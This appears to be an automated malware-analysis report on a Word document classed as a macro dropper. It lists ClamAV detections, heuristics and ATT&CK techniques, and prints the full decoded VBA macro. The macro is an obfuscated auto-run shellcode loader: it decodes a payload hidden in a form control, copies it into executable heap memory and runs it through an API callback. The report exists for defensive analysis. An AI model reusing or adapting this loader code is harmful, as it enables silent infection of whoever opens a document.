Verdict: MALICIOUS (risk score 110)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6399847-0', indicating it functions as a dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the macro executes automatically when the document is opened, a common technique for initiating malicious actions. The macro's obfuscated nature and the heuristic firings point towards it downloading and executing a secondary payload, aligning with the dropper classification.
Heuristics (5)
- ClamAV: Doc.Dropper.Agent-6448136-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6448136-0
- NOP-equivalent sled detected (medium, SC_NOP_EQUIV_SLED): Long run of 0x4B bytes
Disassembly: attempted x86 opcode disassembly of the flagged byte run.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
  Dim assuasive As String
  Private Sub Document_Open()
  Dim needlessly As Byte
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eight below are standard XMP/RDF metadata namespace identifiers of the kind carried in embedded image metadata; each was found in the document body, none in the macro channel.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/camera-raw-settings/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://www.iec.ch (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12535 bytes |

SHA-256: 1fb9c784dd511b64ab85e6ddef706c7e682894c305cf70e5e4e4297b9ff34c5f
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim extinguishment
Dim richly As String
Dim bracteal
Dim footless As String
Dim coriolanus
Dim benefic
Dim assuasive As String
Private Sub Document_Open()
Dim needlessly As Byte
Dim chrysanthemum As String
flugelhorn = "faburden"
anticonvulsant
highlevel = 98
majorca = 56
If highlevel + majorca < 17 Then
highlevel = UCase$("ap") & LCase$("PAriTOR")
footless = richly
oiled = "cos" & Mid("dicynodontiamographynativity", 13, 8)
Else
extinguishment = benefic And 460
majorca = 43
End If
End Sub
Sub PrintAll()
Dim aDoc As Document
For Each aDoc In Documents
aDoc.PrintOut
Next
End Sub
Function manannan()
Dim farmerette As Integer
Dim ameer As Byte
cetacean = 5
While cetacean < 9
hamamelidaceae = "inelegant"
cetacean = cetacean + 1
footless = assuasive
Wend
ebionite = ThisDocument.Path
manannan = ebionite & "/" & ThisDocument.Name
End Function
Function selfdisciplined(nefas, barmecide)
Dim palaemonidae As Variant
Dim rudderpost As Integer
footless = "unparented"
Dim apery As Integer
Dim exalt As Long
Dim ericales As String
Dim windmill As Variant
Dim uncomfortable As Long
bowline exalt, ByVal VarPtr(barmecide) + 8, 4
coriolanus = coriolanus * 1
uncomfortable = nefas
For modeling = 18 To 63
dictyopteran = 63
richly = "lounge"
autosomal = UCase$("SL") & LCase$("eEPl") & UCase$("eSSly")
autosomal = UCase$("Bo") & Right$("militantughten", 6)
Next modeling
bowline ByVal uncomfortable, ByVal exalt, 93 - 37 + 3243
footless = footless
End Function
Sub anticonvulsant()
Dim circumvent As Byte
Dim hest As Byte
proclaim = cavia.counselorship.ControlTipText
disenfranchisement = advance.bureaucratically(proclaim)
rigueur = 56
avouchment = 81
If rigueur + avouchment < 16 Then
rigueur = Right$("tuckedco", 2) & "mbou" & "t"
richly = footless
eukaryote = LCase$("Gr") & Left("adatimblandfordia", 6)
Else
footless = richly
avouchment = 48
End If
sexlinkage = "carpellary"
hiroshima = "fricandeau"
#If Win64 Then
Dim auxilio As Variant
Dim taskthankless As emery
Dim coordinating As LongPtr
taskthankless.header = 0
Dim merging As Variant
#Else
Dim myristicaceae As Integer
taskthankless = 0
Dim moss As Byte
Dim coordinating As Long
#End If
catspaw = 0
baltic = "she"
nitrous = "df"
tutorial = 4096
smutty = 11
While smutty < 16
brant = "fecklessness"
smutty = smutty + 1
extinguishment = bracteal + 466
Wend
nones = 38 + 87 - 112 + 262131
pelvic = quarterbacking(nones, taskthankless, taskthankless)
coordinating = snuffs(pelvic, 0, 3299)
plainsman = Left("nibunkmate", 2) & UCase$("Nos")
moehringia = "vibrato"
Dim lockmaster As String
heartgrief = "riderless"
brazen = "occupations"
lockmaster = manannan
For aerostation = 21 To 52
unrig = 52
footless = "anaplasia"
hesperian = UCase$("Ha") & LCase$("rMs")
hesperian = Left("jiprunella", 2) & Right$("banksiahad", 3)
Next aerostation
luminiferous = disenfranchisement
bushed = "inbasket"
acyclic = "equal"
selfdisciplined coordinating, luminiferous
alterative = "counterbore"
#If Win64 Then
Dim attorney As String
orthography = "commensurability"
godown = Mid("unasupiciousnaburdened", 13, 2) & Right$("skeweduru", 3)
upstaged = "belly"
marigraph = 117 - 127 + 22 + 564
#ElseIf (Win32) Then
marigraph = 77 - 41 + 470 + 1698
#End If
Dim akin As Byte
Dim payphone As String
Dim mesohippus As Long
mesohippus = 0
Dim papilionoideae As Long
papilionoideae = coordinating + marigraph
anastrophe = mastoidectomy(papilionoideae, mesohippus, lockmaster)
For fraction = 4 To 65
healthless = 65
bracteal = bracteal And 153
manorial = Left("ngmuridae", 2) & "wee"
manorial = Right$("angioplastybu", 2) & Mid("cyatheaxomamateurishness", 8, 3)
Next fraction
End Sub
Attribute VB_Name = "advance"
'It stings inside
'Numb me 'til I won't feel pain again
#If Win64 Then
'Life has always been a problem
'It stings inside
Public Type emery
'Can't you see?
'Life has always been a problem
header As LongPtr
'I don't fit in
'I wish I could watch you drown and die
End Type
'And take my time
'I don't fit in
Public Declare PtrSafe Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (cornishwoman As Any, coalman As Any, ByVal philander As LongPtr)
'I lost my mind
'I lost my mind
Public Declare PtrSafe Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal flags As Any, lParam As Any) As LongPtr
'Poisons me with time
'Life has always been a problem
Public Declare PtrSafe Function angelfish Lib "user32" Alias "EndDialog" (ByVal auriform As LongPtr,nResult As LongPtr) As LongPtr
'And take my time
'I don't fit in
Public Declare PtrSafe Function beam Lib "user32" Alias "GetDC" (ByVal apprehensiveness As LongPtr) As LongPtr
'Suffocate feelings you hide with lies
'I lost my mind
Public Declare PtrSafe Function chickweed Lib "kernel32" Alias "RemoveDirectoryA" (asphodeline As LongPtr)
'It's like a needle in my spine
'I can't escape
Public Declare PtrSafe Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal discourtesv As LongPtr,neuropsychiatric As emery, forehand As emery) As LongPtr
'I don't fit in
'Let it all go and in time you will find
Public Declare PtrSafe Function meltable Lib "kernel32" Alias "TlsAlloc" () As LongPtr
'People have said
'It stings inside
Public Declare PtrSafe Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal rouser As LongPtr, ByVal creedal As LongPtr, ByVal americanize As LongPtr) As LongPtr
'Life has always been a problem
'Life has always been a problem
Public Declare PtrSafe Function aeschylean Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As LongPtr)
'Can't you see
'The pressure seems to get me down
'People have said
'I wish I could watch you drown and die
#Else
'It stings inside
'And take my time
Public Declare Function irreversibly Lib "kernel32" Alias "TlsAlloc" () As Long
'It's like a needle in my spine
'I can't deal with your lies
Public Declare Function mastoidectomy Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpEnumFunc As Any, ByVal they As Any, lParam As Any) As Long
'I lost my mind
'I wish I could watch you drown and die
Public Declare Function analects Lib "user32" Alias "EndDialog" (ByVal tellus As Long, coonciseness As Long) As Long
'Can't you see
'Fuck all the shit that you hold in your mind
Public Declare Function quarterbacking Lib "kernel32" Alias "HeapCreate" (ByVal overexploitation As Long, ByVal caramel As Long, ByVal acequiador As Long) As Long
'Life is gone
'Life has always been a problem
Public Declare Function churn Lib "user32" Alias "GetDC" (needful As Long) As Long
'I can't deal with your lies
'Numb me 'til I won't feel pain again
Public Declare Function produce Lib "kernel32" Alias "GetModuleHandle" (lpModuleName As Long)
'I wish I could watch you drown and die
'Can't you see
Public Declare Sub bowline Lib "ntdll" Alias "RtlMoveMemory" (astronautic As Any, damages As Any, ByVal periploca As Long)
'I have no one
'I have no one
Public Declare Function thalassemia Lib "kernel32" Alias "RemoveDirectoryA" (chapfallen As Long)
'It stings inside
'Nothing is real and dies in the lies
Public Declare Function snuffs Lib "kernel32" Alias "HeapAlloc" (ByVal imperatively As Long, ByVal pellet As Long, ByVal cagoule As Long) As Long
'Can't you see?
'Let it all go and in time you will find
'The stress in life
'I am no one
#End If
'Life has always been a problem
'I wish I could watch you drown and die
Function bureaucratically(sightseeing) As String
Dim animalism(63) As Long
Dim arbitrament As Byte
Dim mb As Long
Dim matzo As Byte
Dim cupule(255) As Byte
Dim adore As Integer
Dim bugged As String
richly = richly
Dim noumenon As Long
Dim mantlet() As Byte
Dim melodiously(63) As Long
Dim compatibly As Integer
Dim mayor As Long
Dim bisulcated() As Byte
Dim supineness(63) As Long
assuasive = footless
Dim cheapjack As Long
mortar = 262144
Dim gentlefolk As Variant
calorie = 70 + 65210
bloodstained = 16515072
bromoseltzer = 64
befouled = 16711680
abdominovesical = 4096
Dim botanic As Long
Dim associate As String
pleasingness = 48 + 208
pericranium = 63
clutches = 65536
apterygiformes = 50 + 26 + 99 + 257873
apogon = 125 - 47 - 28 + 3982
indefectible = 66 - 41 + 94 + 136
Dim endamage As Byte
Dim atrocious() As Byte
ReDim atrocious(4287)
kinematicss = 125 - 28 + 4191
For i = 1 To kinematicss
oldhat = Mid$(sightseeing, i, 1)
nummi = (Asc(oldhat))
aquifer = "killifish"
atrocious(i - 1) = nummi
Next
Dim sorites As Variant
For multiplicative = 26 To 58
benison = 58
richly = richly
decurved = UCase$("AsC") & LCase$("ripTI") & UCase$("oN")
decurved = "ca" & Right$("dockagestan", 4) & Right$("witchgrasset", 2)
Next multiplicative
arkansan = UBound(atrocious)
beati = 35
For biserrate = 0 To arkansan
atrocious(biserrate) = atrocious(biserrate) + 2
Next biserrate
prolapse = 10
While prolapse < 14
Start = "heartening"
damaliscus = "nnumber"
prolapse = prolapse + 1
assuasive = assuasive
Wend
adore = 0
mouche = 94 + 114 - 86
floppy = 26 + 99 + 130
For noumenon = 0 To floppy
Select Case noumenon
Case 65 To 90
cupule(noumenon) = noumenon - 65
Case 97 To mouche
cupule(noumenon) = noumenon - 71
Case 48 To 57
cupule(noumenon) = noumenon + 4
Case 43
cupule(noumenon) = 62
Case 47
cupule(noumenon) = 63
End Select
Next noumenon
For noumenon = 0 To 63
melodiously(noumenon) = bug(noumenon, bromoseltzer)
supineness(noumenon) = bug(noumenon, abdominovesical)
animalism(noumenon) = bug(noumenon, mortar)
Next noumenon
dhawa = 5
While dhawa < 9
biceps = "cynomys"
dhawa = dhawa + 1
assuasive = assuasive
Wend
mantlet = atrocious
chionanthus = 79 - 75
ReDim bisulcated((((UBound(mantlet) + 1) \ chionanthus) * 3) - 1)
carnation = 63
blabbermouthed = 100
If carnation + blabbermouthed < 25 Then
carnation = Mid("retaliationthsavant", 12, 2) & Right$("nonreciprocatingeurg", 4) & Left("ypedodontist", 1)
coriolanus = coriolanus And 77
abominate = UCase$("uN") & Left("reportedphallic", 8)
Else
assuasive = footless
blabbermouthed = 85
End If
apologetically = 3
assuasive = "cylindrical"
extinguishment = benefic - 396
falcon = apologetically + 1
insistence = 2
For cheapjack = 0 To UBound(mantlet) Step falcon
cagily = mantlet(cheapjack)
mayor = animalism(cupule(cagily)) _
+ supineness(cupule(mantlet(cheapjack + 1))) + melodiously(cupule(mantlet(cheapjack + 2))) + cupule(mantlet(cheapjack + apologetically))
noumenon = centigram(mayor, befouled)
bisulcated(mb) = disapproving(noumenon, clutches)
noumenon = centigram(mayor, calorie)
bisulcated(mb + 1) = disapproving(noumenon, pleasingness)
bisulcated(mb + insistence) = centigram(mayor, indefectible)
mb = mb + insistence + 1
Next cheapjack
bureaucratically = bisulcated
End Function
Function disapproving(grimfaced, cornaro)
disapproving = grimfaced \ cornaro
End Function
Function bug(farthing, minuteness)
bug = farthing * minuteness
End Function
Function centigram(logorrhea, deliquation)
centigram = logorrhea And deliquation
End Function
Sub StandardInputBox()
Dim strName As String
'InputBox(prompt[, title] [, default] [, xpos] [, ypos] [, helpfile, context])
strName = InputBox("Enter you name.", "NAME COLLECTOR")
'Exit sub if Cancel button used or no text entered
If strName = vbNullString Then Exit Sub
MsgBox "Hello " & strName
End Sub
Attribute VB_Name = "cavia"
Attribute VB_Base = "0{2076C3FE-455B-4875-81A4-572CE93C0EDE}{B6DAAB8F-F905-4CC2-8AA4-D08FF13E68DB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "stayathome"
Attribute VB_Base = "0{5C688934-CF2A-4B9F-900E-04BC1C6F90DD}{2EB0EEE2-E1FC-41C2-AB30-D8109ECE5099}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False